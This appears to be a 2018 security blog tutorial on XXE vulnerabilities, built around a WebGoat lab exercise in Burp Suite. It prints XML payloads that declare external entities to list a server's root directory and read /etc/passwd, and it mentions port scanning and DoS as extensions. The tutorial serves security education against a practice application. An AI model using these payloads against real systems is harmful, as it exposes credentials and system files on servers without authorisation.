How to exploit XXE vulnerabilities?

January 25, 2018

Hi everyone. In this blog, we are going to discuss a critical web application vulnerability known as XML External Entity vulnerability also known as XXE. XXE is at the 4th position of the OWASP TOP 10 vulnerabilities in 2017.

What is XXE actually?

XXE vulnerabilities are used to exploit how an application parses the XML input or basically attacking the XML parser itself with the help of external entities. If you are not so sure about XML first, then please read about it and then continue this blog so that you understand the syntax.

A simple XML document will look something like this:

<?xml version="1.0" encoding="UTF-8"?>

Here the first line declares the starting of XML. And all the tags are called elements. Here, employee is the root element.

Read more about DTD’s and attributes from here.

What are External Entities?

So, an XML entity is used to reference some information externally or internally. If the entity declaration and everything is done inside the same document and nothing needs to be fetched externally then this is called Internal Entity.Eg:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE employee [
<!ELEMENT employee(#PCDATA)>
<!ENTITY name "Shanks">

Now, when the XML parser goes through this XML document, the file from the URI handler is downloaded and substituted in place of the external entity references. These are called External Entities.

Practical Example of XXE:

The best way to learn about XXE vulnerabilities would be to practice it. So open up WebGoat and go to Parameter Tampering exercise. You will find the mission for XXE vulnerability there. Make sure to start Burpsuite to capture requests. If you are having any problems, setting WebGoat with Burpsuite, please see the video here.

The problem is to find the vulnerability in the search form and list the root directory. You can also extend the attack to get the password files and do many more things.

Now, when you just enter a random thing and check the Request,

POST /WebGoat/attack?Screen=87365&menu=1700 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/WebGoat/start.mvc
Content-Length: 66
Content-Type: text/plain;charset=UTF-8
Connection: close

<?xml version="1.0"?>

You can see that an XML parser is in place. And you can now start playing with different XML inputs to exploit any vulnerability in the XML parser.
So here, we can use External entities. External entities defined in the DTD will be replaced in the form element and that will do the trick.

So, capture this request in Burpsuite and change the XML code with

<?xml version="1.0"?>
<!DOCTYPE xmlattack [
<!ENTITY sname SYSTEM "file:/">

Here since we need to get the directory listing, we have used file:/ as the external URI and sname is the name of the external Entity. If you are familiar with the syntax of XML, it’s nothing fancy.

Now, you can also leverage this attack to get password files or do a whole port scan of the internal system and DOS attacks too.

We just need to change the external URI to do the trick for us

<?xml version="1.0"?>
<!DOCTYPE xmlattack [
<!ENTITY sname SYSTEM "file:///etc/passwd">

We get the contents of the /etc/passwd file from the server as the response.

How dangerous is XXE?

XXE vulnerabilities can lead to different attacks. The first one as you saw above to read juicy configuration files which can contain sensitive information such as username and password from the server. Scanning of different ports of a remote host, Remote Code Execution and Denial of Service attacks are possible through XXE vulnerabilities.

Where to look for XXE vulnerabilities?

XML parsers are very common nowadays and many of them are still misconfigured. They can be found in the form of API endpoints and even in the file upload forms which process XML after getting uploaded. You need to see where XML parser is being used and how it is parsing different inputs to exploit any vulnerabilities present. Companies do give a cool amount of bounty for reporting these kinds of bugs in Bug Bounties. So better start reading it from OWASP and other resources.

This is all for this post. If you didn’t understand something or want any help, do comment below. Until then, keep learning and keep Hacking.:)